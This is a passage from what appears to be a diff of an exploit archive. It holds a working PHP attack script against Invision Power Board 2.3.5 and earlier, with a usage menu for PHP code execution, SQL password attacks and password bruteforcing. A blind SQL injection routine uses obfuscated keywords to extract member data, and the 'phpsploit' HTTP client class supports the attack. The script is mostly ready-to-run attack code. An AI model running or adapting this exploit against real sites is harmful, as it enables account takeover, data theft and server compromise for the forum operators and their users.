+http://www.phpbazar.com/bazar/classified.php?catid=2&subcatid=5&adid=832 order by 911/*
+Unknown column '911' in 'order clause'
+
+http://www.phpbazar.com/bazar/classified.php?catid=2&subcatid=5&adid=832 order by 67/*
+Unknown column '67' in 'order clause'
+
+http://www.phpbazar.com/bazar/classified.php?catid=2&subcatid=5&adid=832 order by 66/*
+Error : Database Query Error
+
+...so its 66...omg :D
+you can find columns this like:
+http://www.phpbazar.com/bazar/classified.php?catid=2&subcatid=5&adid=832 union select sum(somecolumn) from users--
+
+username,password:
+
+http://www.xxx.com/bazar/classified.php?catid=2&subcatid=5&adid=832 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,username,password,53,54,55,56,57,58,59,60,61,62,63,64,65,66 from mysql.user/*
+
+# milw0rm.com [2008-08-20]
diff --git a/platforms/php/webapps/6281.pl b/platforms/php/webapps/6281.pl
index 4562c55d0..57bef5aaa 100755
--- a/platforms/php/webapps/6281.pl
+++ b/platforms/php/webapps/6281.pl
@@ -1,85 +1,85 @@
- php '.$argv[0].' http://www.site.com/en/****.php?we_objectID=21 1
-#
-###############################################################
-');
-if ($argc > 1) {
-$url = $argv[1];
-if ($argc < 3) {
-$userid = 1;
-} else {
-$userid = $argv[2];
-}
-$r = strlen(file_get_contents($url."'and+1=1/*"));
-echo "\nExploiting:\n";
-$w = strlen(file_get_contents($url."'and+1=0/*"));
-$t = abs((100-($w/$r*100)));
-echo "Password: ";
-for ($j = 1; $j <= 32; $j++) {
- for ($i = 46; $i <= 102; $i=$i+2) {
- if ($i == 60) {
- $i = 98;
- }
- $laenge = strlen(file_get_contents($url."'and+ascii(substring((select+passwd+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*"));
- if (abs((100-($laenge/$r*100))) > $t-1) {
- $laenge = strlen(file_get_contents($url."'and+ascii(substring((select+passwd+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*"));
- if (abs((100-($laenge/$r*100))) > $t-1) {
- echo chr($i-1);
- } else {
- echo chr($i);
- }
- $i = 102;
- }
- }
-}
-echo "\nUsername: ";
-for ($i=1; $i <= 30; $i++) {
-$laenge = strlen(file_get_contents($url."'and+ascii(substring((select+username+from+tblUser+where+id=".$userid."+limit+0,1),".$i.",1))!=0/*"));
- if (abs((100-($laenge/$r*100))) > $t-1) {
- $count = $i;
- $i = 30;
- }
-}
-for ($j = 1; $j < $count; $j++) {
- for ($i = 46; $i <= 122; $i=$i+2) {
- if ($i == 60) {
- $i = 98;
- }
- $laenge = strlen(file_get_contents($url."'and+ascii(substring((select+username+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*"));
- if (abs((100-($laenge/$r*100))) > $t-1) {
- $laenge = strlen(file_get_contents($url."'and+ascii(substring((select+username+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*"));
- if (abs((100-($laenge/$r*100))) > $t-1) {
- echo chr($i-1);
- } else {
- echo chr($i);
- }
- $i = 122;
- }
- }
-}
-
-} else {
-echo "\nExploiting failed: Not enough arguments?\n";
-}
-?>
-
-# milw0rm.com [2008-08-20]
+ php '.$argv[0].' http://www.site.com/en/****.php?we_objectID=21 1
+#
+###############################################################
+');
+if ($argc > 1) {
+$url = $argv[1];
+if ($argc < 3) {
+$userid = 1;
+} else {
+$userid = $argv[2];
+}
+$r = strlen(file_get_contents($url."'and+1=1/*"));
+echo "\nExploiting:\n";
+$w = strlen(file_get_contents($url."'and+1=0/*"));
+$t = abs((100-($w/$r*100)));
+echo "Password: ";
+for ($j = 1; $j <= 32; $j++) {
+ for ($i = 46; $i <= 102; $i=$i+2) {
+ if ($i == 60) {
+ $i = 98;
+ }
+ $laenge = strlen(file_get_contents($url."'and+ascii(substring((select+passwd+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*"));
+ if (abs((100-($laenge/$r*100))) > $t-1) {
+ $laenge = strlen(file_get_contents($url."'and+ascii(substring((select+passwd+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*"));
+ if (abs((100-($laenge/$r*100))) > $t-1) {
+ echo chr($i-1);
+ } else {
+ echo chr($i);
+ }
+ $i = 102;
+ }
+ }
+}
+echo "\nUsername: ";
+for ($i=1; $i <= 30; $i++) {
+$laenge = strlen(file_get_contents($url."'and+ascii(substring((select+username+from+tblUser+where+id=".$userid."+limit+0,1),".$i.",1))!=0/*"));
+ if (abs((100-($laenge/$r*100))) > $t-1) {
+ $count = $i;
+ $i = 30;
+ }
+}
+for ($j = 1; $j < $count; $j++) {
+ for ($i = 46; $i <= 122; $i=$i+2) {
+ if ($i == 60) {
+ $i = 98;
+ }
+ $laenge = strlen(file_get_contents($url."'and+ascii(substring((select+username+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*"));
+ if (abs((100-($laenge/$r*100))) > $t-1) {
+ $laenge = strlen(file_get_contents($url."'and+ascii(substring((select+username+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*"));
+ if (abs((100-($laenge/$r*100))) > $t-1) {
+ echo chr($i-1);
+ } else {
+ echo chr($i);
+ }
+ $i = 122;
+ }
+ }
+}
+
+} else {
+echo "\nExploiting failed: Not enough arguments?\n";
+}
+?>
+
+# milw0rm.com [2008-08-20]
diff --git a/platforms/php/webapps/6284.txt b/platforms/php/webapps/6284.txt
index 5ce37ceb4..80bdf1cc8 100755
--- a/platforms/php/webapps/6284.txt
+++ b/platforms/php/webapps/6284.txt
@@ -1,24 +1,24 @@
-Author: ~!Dok_tOR!~
-Date found: 21.08.08
-Product: CCMS Gaming Portal
-Version: 4.0
-The price: $55
-URL: customcms.net
-Vulnerability Class: SQL injection
-
-print.php
-
-Vuln code:
-
-$q = mysql_query("SELECT * from ccms_news_comments WHERE w_id='$id'");
-
-
-magic_quotes_gpc = Off
-
-http://localhost/[installdir]/
-
-Exploit:
-
-print.php?id='+union+select+1,concat_ws(0x3a,usern ame,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21+from+ccms_user+where+userid=1/*
-
-# milw0rm.com [2008-08-21]
+Author: ~!Dok_tOR!~
+Date found: 21.08.08
+Product: CCMS Gaming Portal
+Version: 4.0
+The price: $55
+URL: customcms.net
+Vulnerability Class: SQL injection
+
+print.php
+
+Vuln code:
+
+$q = mysql_query("SELECT * from ccms_news_comments WHERE w_id='$id'");
+
+
+magic_quotes_gpc = Off
+
+http://localhost/[installdir]/
+
+Exploit:
+
+print.php?id='+union+select+1,concat_ws(0x3a,usern ame,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21+from+ccms_user+where+userid=1/*
+
+# milw0rm.com [2008-08-21]
diff --git a/platforms/php/webapps/6285.txt b/platforms/php/webapps/6285.txt
index 21f6250ce..d0d226d93 100755
--- a/platforms/php/webapps/6285.txt
+++ b/platforms/php/webapps/6285.txt
@@ -1,61 +1,61 @@
-Author: ~!Dok_tOR!~
-Date found: 18.08.08
-Product: PhotoCart
-Version: 3.9 возможно и более ранние версии
-Type: Photography Shopping Cart
-URL: www.picturespro.com
-Vulnerability Class: SQL Injection
-
-/[installdir]/search.php
-
-Vuln code:
-
-PHP:
-if($_REQUEST['searchby'] == "qtitle") {
-$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_title LIKE '%".$_REQUEST['qtitle']."%' ";
-print "Results for Gallery or event name: ".$_REQUEST['qtitle']." ";
-}
-if($_REQUEST['searchby'] == "qid") {
-$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_id='".$_REQUEST['qid']."' ";
-print "Results for Gallery or event ID: ".$_REQUEST['qid']." ";
-}
-if($_REQUEST['searchby'] == "qdate") {
-$gdate = "".$_REQUEST['qyear']."-".$_REQUEST['qmonth']."-".$_REQUEST['qday']."";
-$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_date='$gdate' ";
-print "Results for Gallery or event date: ".$_REQUEST['qmonth']."-".$_REQUEST['qday']."-".$_REQUEST['qyear']." ";
-}
-
-
-magic_quotes_gpc = Off
-
-Example:
-http://[server]/[installdir]/search.php
-
-Вводим в поле Gallery or event name:
-
-Exploit 1:
-
-' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26 from admin/*
-
-
-
-Exploit 2:
-
-' union select 1,2,3,4,5,concat_ws(0x3a,client_name,client_pass,c lient_email),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26 from pc_clients/*
-
-
-
-Authentication Bypass SQL Injection
-
-/[installdir]/_login.php
-
-Vuln code:
-
-PHP:
-$result = @mysql_query("SELECT * FROM pc_clients WHERE client_email='".$_REQUEST['email']."' AND client_pass='".$_REQUEST['password']."'");
-
-
-Email Address: 1' or 1=1/*
-Password: 1' or 1=1/*
-
-# milw0rm.com [2008-08-21]
+Author: ~!Dok_tOR!~
+Date found: 18.08.08
+Product: PhotoCart
+Version: 3.9 возможно и более ранние версии
+Type: Photography Shopping Cart
+URL: www.picturespro.com
+Vulnerability Class: SQL Injection
+
+/[installdir]/search.php
+
+Vuln code:
+
+PHP:
+if($_REQUEST['searchby'] == "qtitle") {
+$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_title LIKE '%".$_REQUEST['qtitle']."%' ";
+print "Results for Gallery or event name: ".$_REQUEST['qtitle']." ";
+}
+if($_REQUEST['searchby'] == "qid") {
+$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_id='".$_REQUEST['qid']."' ";
+print "Results for Gallery or event ID: ".$_REQUEST['qid']." ";
+}
+if($_REQUEST['searchby'] == "qdate") {
+$gdate = "".$_REQUEST['qyear']."-".$_REQUEST['qmonth']."-".$_REQUEST['qday']."";
+$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_date='$gdate' ";
+print "Results for Gallery or event date: ".$_REQUEST['qmonth']."-".$_REQUEST['qday']."-".$_REQUEST['qyear']." ";
+}
+
+
+magic_quotes_gpc = Off
+
+Example:
+http://[server]/[installdir]/search.php
+
+Вводим в поле Gallery or event name:
+
+Exploit 1:
+
+' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26 from admin/*
+
+
+
+Exploit 2:
+
+' union select 1,2,3,4,5,concat_ws(0x3a,client_name,client_pass,c lient_email),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26 from pc_clients/*
+
+
+
+Authentication Bypass SQL Injection
+
+/[installdir]/_login.php
+
+Vuln code:
+
+PHP:
+$result = @mysql_query("SELECT * FROM pc_clients WHERE client_email='".$_REQUEST['email']."' AND client_pass='".$_REQUEST['password']."'");
+
+
+Email Address: 1' or 1=1/*
+Password: 1' or 1=1/*
+
+# milw0rm.com [2008-08-21]
diff --git a/platforms/php/webapps/6286.txt b/platforms/php/webapps/6286.txt
index 5be063705..5c2859dd3 100755
--- a/platforms/php/webapps/6286.txt
+++ b/platforms/php/webapps/6286.txt
@@ -1,32 +1,32 @@
-###########################################################################
-[+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF
-[+] Discovered By SirGod
-[+] www.mortal-team.org
-[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN
-###########################################################################
-
-[+] Arbitrary Download Database
-
-Go to
-
- http://localhost/[Path]/adminpanel/phpmydump.php
-
-and the download will begin ( database.sql ) .
-
-
-[+] Cross Site Scripting
-
- http://localhost/[Path]/merchandise.php?type=[XSS]
- http://localhost/[Path]/merchandise.php?type=
-
-
-[+] Cross Site Request Forgery
-
- If a logged in user with administrator privilegies click the following url he will be logged out.
-
- http://localhost/[Path]/adminpanel/logout.php
-
-
-###########################################################################
-
-# milw0rm.com [2008-08-21]
+###########################################################################
+[+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF
+[+] Discovered By SirGod
+[+] www.mortal-team.org
+[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN
+###########################################################################
+
+[+] Arbitrary Download Database
+
+Go to
+
+ http://localhost/[Path]/adminpanel/phpmydump.php
+
+and the download will begin ( database.sql ) .
+
+
+[+] Cross Site Scripting
+
+ http://localhost/[Path]/merchandise.php?type=[XSS]
+ http://localhost/[Path]/merchandise.php?type=
+
+
+[+] Cross Site Request Forgery
+
+ If a logged in user with administrator privilegies click the following url he will be logged out.
+
+ http://localhost/[Path]/adminpanel/logout.php
+
+
+###########################################################################
+
+# milw0rm.com [2008-08-21]
diff --git a/platforms/php/webapps/6287.txt b/platforms/php/webapps/6287.txt
index 509e5468a..9b1ca8ce0 100755
--- a/platforms/php/webapps/6287.txt
+++ b/platforms/php/webapps/6287.txt 
@@ -1,30 +1,30 @@
-########################################################################################
-#
-# Name : tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability
-# Author : cOndemned [ Dark-Coders ]
-# Greetz : Avantura, str0ke, ZaBeaTy, doctor, voo|doo, sid.psycho, irk4z
-# Conditions : Magic quotes gpc = Off / Register Globals = On
-# Other info : Prior versions probably are vulnerable too
-#
-########################################################################################
-
-Source of /modules/ZZ_Templater/templater.php
-
- [ ... ]
-
- 17. $ftemplatedir = 'templates/'.$config['template'].'/';
- 18. include('templates/'.$config['template'].'/data.php'); // <--- LFI
- 19. if($tdata['useblocks'] == 1)
-
- [ ... ]
-
-
-Proof of Concept :
-
- http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00
- http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00
-
-
-Jusf 4 fun
-
-# milw0rm.com [2008-08-21]
+########################################################################################
+#
+# Name : tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability
+# Author : cOndemned [ Dark-Coders ]
+# Greetz : Avantura, str0ke, ZaBeaTy, doctor, voo|doo, sid.psycho, irk4z
+# Conditions : Magic quotes gpc = Off / Register Globals = On
+# Other info : Prior versions probably are vulnerable too
+#
+########################################################################################
+
+Source of /modules/ZZ_Templater/templater.php
+
+ [ ... ]
+
+ 17. $ftemplatedir = 'templates/'.$config['template'].'/';
+ 18. include('templates/'.$config['template'].'/data.php'); // <--- LFI
+ 19. if($tdata['useblocks'] == 1)
+
+ [ ... ]
+
+
+Proof of Concept :
+
+ http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00
+ http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00
+
+
+Jusf 4 fun
+
+# milw0rm.com [2008-08-21]
diff --git a/platforms/php/webapps/6288.txt b/platforms/php/webapps/6288.txt
index 9cb1ac6fd..f6a069e40 100755
--- a/platforms/php/webapps/6288.txt
+++ b/platforms/php/webapps/6288.txt
@@ -1,47 +1,47 @@
-####################################################################
-[+] EasySite v2.3 Multiple Remote Vulnerabilities
-[+] Discovered By SirGod
-[+] www.mortal-team.org
-[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin ,ToxicBlood,MesSiAH,xZu,HrN
-####################################################################
-
-[+] Local File Inclusion
-
-http://localhost/www/index.php?module=Accueil&action=../../../../autoexec.bat%00
-http://localhost/modules/Module/index.php?module=../../../../autoexec.bat%00
-http://localhost/modules/Module/index.php?ss_module=../../../../autoexec.bat%00
-http://localhost/modules/Module/index.php?ss_action=../../../../autoexec.bat%00
-http://localhost/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00
-http://localhost/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00
-http://localhost/modules/Themes/index.php?module=../../../../autoexec.bat%00
-
-And many others...
-
-This will open autoexec.bat
-
-[+] Arbitrary View Folder Contents
-
-You can view the folder contents and the content of files view via LFI.
-
- http://localhost/www/index.php?module=../../../
-
- http://localhost/inc/vmenu.php?module=../../../
-
-This will open C:/ directory and will show all the files from C:/ .
-
-Example :
-
- * BOOTSECT.BAK
- * BcBtRmv.log
- * IO.SYS
- * MSDOS.SYS
- * autoexec.bat
- * bootmgr
- * config.sys
- * grldr
- * hiberfil.sys
- * pagefile.sys
-
-####################################################################
-
-# milw0rm.com [2008-08-21]
+####################################################################
+[+] EasySite v2.3 Multiple Remote Vulnerabilities
+[+] Discovered By SirGod
+[+] www.mortal-team.org
+[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin ,ToxicBlood,MesSiAH,xZu,HrN
+####################################################################
+
+[+] Local File Inclusion
+
+http://localhost/www/index.php?module=Accueil&action=../../../../autoexec.bat%00
+http://localhost/modules/Module/index.php?module=../../../../autoexec.bat%00
+http://localhost/modules/Module/index.php?ss_module=../../../../autoexec.bat%00
+http://localhost/modules/Module/index.php?ss_action=../../../../autoexec.bat%00
+http://localhost/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00
+http://localhost/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00
+http://localhost/modules/Themes/index.php?module=../../../../autoexec.bat%00
+
+And many others...
+
+This will open autoexec.bat
+
+[+] Arbitrary View Folder Contents
+
+You can view the folder contents and the content of files view via LFI.
+
+ http://localhost/www/index.php?module=../../../
+
+ http://localhost/inc/vmenu.php?module=../../../
+
+This will open C:/ directory and will show all the files from C:/ .
+
+Example :
+
+ * BOOTSECT.BAK
+ * BcBtRmv.log
+ * IO.SYS
+ * MSDOS.SYS
+ * autoexec.bat
+ * bootmgr
+ * config.sys
+ * grldr
+ * hiberfil.sys
+ * pagefile.sys
+
+####################################################################
+
+# milw0rm.com [2008-08-21]
diff --git a/platforms/php/webapps/6291.txt b/platforms/php/webapps/6291.txt
index 708642550..12a70ec69 100755
--- a/platforms/php/webapps/6291.txt
+++ b/platforms/php/webapps/6291.txt
@@ -1,196 +1,196 @@ -################################################################################ -[+] NoName Script 1.1 BETA Multiple Remote Vulnerabilities -[+] Discovered By SirGod -[+] www.mortal-team.org -[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz -################################################################################# - -[+] Local File Inclusion - - http://localhost/index.php?action=../../../autoexec.bat%00&kategorie=Tutorial - - This will open autoexec.bat . - -[+] SQL Injection - - http://localhost/index.php?action=newsadmindel&file_id=[SQL] - -[+] Cross Site Request Forgery - - If an logged in user with administrative permisions will click the following link ,he will be logged out. - - http://localhost/logout.php - -[+] Cross Site Request Forgery - Change User Profile - - If an logged in user with administrative permisions will click the following link the following action will be executed. - - What to change : - - - form action and profil_id :
    - action : change http://localhost with the website link. - profil_id : id of the user that you want to change settings for it - - input value :

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - Benutzerinformationen -
    Benutzername: 
    Benutzergruppe:  - -

    - Zusätzliche Informationen -
    Geschlecht:  - - -
    Geburtstag:  - - - - - -
    Benutzertext:  -
    Homepage: 

    - - Instant Messaging -
    ICQ-Nummer: 
    MSN-Name: 
    AIM-Name: 

    - Verwarnungen -
      - - Admin wurde noch nicht verwarnt.
    Aktion:  - Verwarnungen verwalten -
     
     
    - - -################################################################################# - -# milw0rm.com [2008-08-23] +################################################################################ +[+] NoName Script 1.1 BETA Multiple Remote Vulnerabilities +[+] Discovered By SirGod +[+] www.mortal-team.org +[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz +################################################################################# + +[+] Local File Inclusion + + http://localhost/index.php?action=../../../autoexec.bat%00&kategorie=Tutorial + + This will open autoexec.bat . + +[+] SQL Injection + + http://localhost/index.php?action=newsadmindel&file_id=[SQL] + +[+] Cross Site Request Forgery + + If an logged in user with administrative permisions will click the following link ,he will be logged out. + + http://localhost/logout.php + +[+] Cross Site Request Forgery - Change User Profile + + If an logged in user with administrative permisions will click the following link the following action will be executed. + + What to change : + + - form action and profil_id :
    + action : change http://localhost with the website link. + profil_id : id of the user that you want to change settings for it + - input value :
    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + #i"; - $this->reg_cpre = '#^(.*)session_id$#'; - # $this->reg_acp = '#s_agent = 'Mozilla Firefox'; - $this->s_ip = $this->def_ip; - - return; - } - - function bf_inj() - { - $this->sub_chr = $this->t_bchar; - $this->key_val = ''; - - if( !empty($this->t_key) ) - $this->msg('', 0); - - while( true ) - { - if( $this->t_bchar < 0 ) - $this->sub_chr--; - - else - $this->sub_chr++; - - # 0-9a-f - for( $j=0;$j<=count($this->t_char);$j++ ) - { - # That one ? - $chr = $this->t_char[$j]; - - # Latest char ? - if( $j === count($this->t_char) ) - $chr = $this->t_end; - - # Ascii num - $asc = ord($chr); - - # Screen bug - if( !empty($this->t_key) ) - { - $msg = $this->t_key.'='.$this->key_val; - $msg .= ($chr === $this->t_end ? "\x20" : $chr); - - $this->msg($msg, 0, 1, 1); - } - - # Focus on the target ? - if( !empty($this->t_join) ) - { - $inj = - 'SEL%0DECT 1,'.$this->t_sel.' FR%0DOM '.$this->p_pre.$this->t_table. - ' t, '.$this->p_pre.'members m WH%0DERE '.$this->t_join. - ' AND m.'.$this->t_on.' AND ASC%0DII(SUBS%0DTR('.$this->t_field. - ','.$this->sub_chr.',1))='.$asc.' '.$this->t_add_0; - } - else - { - $inj = - 'SEL%0DECT 1,'.$this->t_sel.' FR%0DOM '.$this->p_pre.$this->t_table. - ' t WH%0DERE ASC%0DII(SUB%0DSTR('.$this->t_field.','.$this->sub_chr. - ',1))='.$asc.' '.$this->t_add_0; - } - - # SQL Injection via rawurldecode() - $inj = str_replace('%rep_req%', $inj, $this->def_inj); - $inj = str_replace('%rep_add%', $this->t_add_1, $inj); - $inj = str_replace(array('"', "'"), array('%2522', '%2527'), $inj); - - # Params - $inj = str_replace('%rep_inj%', $inj, $this->def_param); - $inj = str_replace(array(' ', '#'), array('%20', '%23'), $inj); - - $this->web->get($this->p_url.$inj); - - # Ok !? 
- if( !strstr($this->web->getcontent(), 'notfound') ) - { - if( $chr !== $this->t_end ) - { - $this->key_val .= $chr; - break; - } - } - - # End - if( $chr === $this->t_end ) - { - # Reverse - if( $this->t_bchar < 0 ) - $this->key_val = strrev($this->key_val); - - if( !empty($this->t_key) ) - $this->msg($this->t_key.'='.$this->key_val, 1, 1, 1); - - return $this->key_val; - } - } - } - - } - - function get_p($p, $exit=false) - { - global $argv; - - foreach( $argv as $key => $value ) - { - if( $value === '-'.$p ) - { - if( isset($argv[$key+1]) && !empty($argv[$key+1]) ) - { - return $argv[$key+1]; - } - else - { - if( $exit ) - $this->usage(); - - return true; - } - } - } - - if( $exit ) - $this->usage(); - - return false; - } - - function msg($msg, $nstatus, $nspace=1, $ndel=0, $ask=false) - { - if( $ndel ) $type = "\r"; - else $type = "\n"; - - # wtf (: - print - ( - $type.str_repeat("\x20", $nspace). - $this->stat[$nstatus]."\x20".$msg - ); - - if( $ask ) - return trim(fgets(STDIN)); - } - - function give_hope() - { - $this->msg('You should try with another user or try another time', -1); - - exit(1); - } - - function mhead() - { - # Advisory: http://acid-root.new.fr/?0:18 - - print "\n Invision Power Board <= 2.3.5 Multiple Vulnerabilities"; - print "\n ------------------------------------------------------"; - print "\n\n About:"; - print "\n\n by DarkFig < gmdarkfig (at) gmail (dot) com >"; - print "\n http://acid-root.new.fr/"; - print "\n #acidroot@irc.worldnet.net"; - print "\n\n\n Attack(s):\n"; - - return; - } - - function usage() - { - - print "\n -attack [options]\n\n"; - print " 1 - PHP code execution\n\n"; - print " -url IPB url with ending slash\n\n"; - print " -uname targeted username\n"; - print " -uid OR the targeted user id (def: 1)\n\n"; - print " -prefix sql table prefix (def: ibf_)\n"; - print " -acp admin control panel path (def: admin)\n\n\n"; - print " 2 - Insecure SQL password usage\n\n"; - print " -ip your current IP\n"; - print " -dict a 
wordlist file\n\n"; - print " -url IPB url with ending slash\n"; - print " -uname a valid member username\n"; - print " -pwd the associated password\n\n"; - print " -uid OR the targeted member id\n"; - print " -passhash the passhash cookie value\n"; - print " -stronghold the stronghold cookie value\n\n"; - print " -sqlusr you can precise the sql user\n"; - print " -prefix sql table prefix (def: ibf_)\n\n\n"; - print " 3 - Password bruteforcer\n\n"; - print " -dict a wordlist file\n\n"; - print " -url IPB url with ending slash\n"; - print " -uname targeted username\n"; - print " -uid OR the targeted user id (def: 1)\n"; - print " -prefix sql table prefix (def: ibf_)\n\n"; - print " -passhash OR the passhash value\n"; - print " -salt the salt value\n\n\n"; - print " Optional: \n\n"; - print " -proxhost if you wanna use a proxy\n"; - print " -proxauth proxy with authentication\n"; - - exit(1); - } - -} - - - -/* - * - * Copyright (C) darkfig - * - * This program is free software; you can redistribute it and/or - * modify it under the terms of the GNU General Public License - * as published by the Free Software Foundation; either version 2 - * of the License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program; if not, write to the Free Software - * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. 
- * - * TITLE: PhpSploit Class - * REQUIREMENTS: PHP 4 / PHP 5 - * VERSION: 2.1 - * LICENSE: GNU General Public License - * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt - * FILENAME: phpsploitclass.php - * - * CONTACT: gmdarkfig@gmail.com (french / english) - * GREETZ: Sparah, Ddx39 - * - * DESCRIPTION: - * The phpsploit is a class implementing a web user agent. - * You can add cookies, headers, use a proxy server with (or without) a - * basic authentification. It supports the GET and the POST method. It can - * also be used like a browser with the cookiejar() function (which allow - * a server to add several cookies for the next requests) and the - * allowredirection() function (which allow the script to follow all - * redirections sent by the server). It can return the content (or the - * headers) of the request. Others useful functions can be used for debugging. - * A manual is actually in development but to know how to use it, you can - * read the comments. - * - * CHANGELOG: - * - * [2008-08-29] (2.1) - * * New: The showheader()/showcookie() functions can now return an array - * * Bug #3 fixed: Problem concerning some servers for the main function - * - * [2007-06-10] (2.0) - * * Code: Code optimization - * * New: Compatible with PHP 4 by default - * - * [2007-01-24] (1.2) - * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) - * * New: multipart/form-data enctype is now supported - * - * [2006-12-31] (1.1) - * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) - * * New: You can now call the getheader() / getcontent() function without parameters - * - * [2006-12-30] (1.0) - * * First version - * - */ - -class phpsploit -{ - var $proxyhost; - var $proxyport; - var $host; - var $path; - var $port; - var $method; - var $url; - var $packet; - var $proxyuser; - var $proxypass; - var $header; - var $cookie; - var $data; - var $boundary; - var $allowredirection; - var $last_redirection; - var $cookiejar; 
- var $recv; - var $cookie_str; - var $header_str; - var $server_content; - var $server_header; - - - /** - * This function is called by the - * get()/post()/formdata() functions. - * You don't have to call it, this is - * the main function. - * - * @access private - * @return string $this->recv ServerResponse - * - */ - function sock() - { - if(!empty($this->proxyhost) && !empty($this->proxyport)) - $socket = @fsockopen($this->proxyhost,$this->proxyport); - else - $socket = @fsockopen($this->host,$this->port); - - if(!$socket) - die("Error: Host seems down"); - - if($this->method=='get') - $this->packet = 'GET '.$this->url." HTTP/1.1\r\n"; - - elseif($this->method=='post' or $this->method=='formdata') - $this->packet = 'POST '.$this->url." HTTP/1.1\r\n"; - - else - die("Error: Invalid method"); - - if(!empty($this->proxyuser)) - $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n"; - - if(!empty($this->header)) - $this->packet .= $this->showheader(); - - if(!empty($this->cookie)) - $this->packet .= 'Cookie: '.$this->showcookie()."\r\n"; - - $this->packet .= 'Host: '.$this->host."\r\n"; - $this->packet .= "Connection: Close\r\n"; - - if($this->method=='post') - { - $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; - $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; - $this->packet .= $this->data."\r\n"; - } - elseif($this->method=='formdata') - { - $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n"; - $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; - $this->packet .= $this->data; - } - - $this->packet .= "\r\n"; - $this->recv = ''; - - fputs($socket, $this->packet); - - while(!feof($socket)) - $this->recv .= fgets($socket); - - fclose($socket); - - if($this->cookiejar) - $this->getcookie(); - - if($this->allowredirection) - return $this->getredirection(); - else - return $this->recv; - } - - - /** - 
* This function allows you to add several - * cookies in the request. - * - * @access public - * @param string cookn CookieName - * @param string cookv CookieValue - * @example $this->addcookie('name','value') - * - */ - function addcookie($cookn,$cookv) - { - if(!isset($this->cookie)) - $this->cookie = array(); - - $this->cookie[$cookn] = $cookv; - } - - - /** - * This function allows you to add several - * headers in the request. - * - * @access public - * @param string headern HeaderName - * @param string headervalue Headervalue - * @example $this->addheader('Client-IP', '128.5.2.3') - * - */ - function addheader($headern,$headervalue) - { - if(!isset($this->header)) - $this->header = array(); - - $this->header[$headern] = $headervalue; - } - - /** - * This function allows you to use an - * http proxy server. Several methods - * are supported. - * - * @access public - * @param string proxy ProxyHost - * @param integer proxyp ProxyPort - * @example $this->proxy('localhost',8118) - * @example $this->proxy('localhost:8118') - * - */ - function 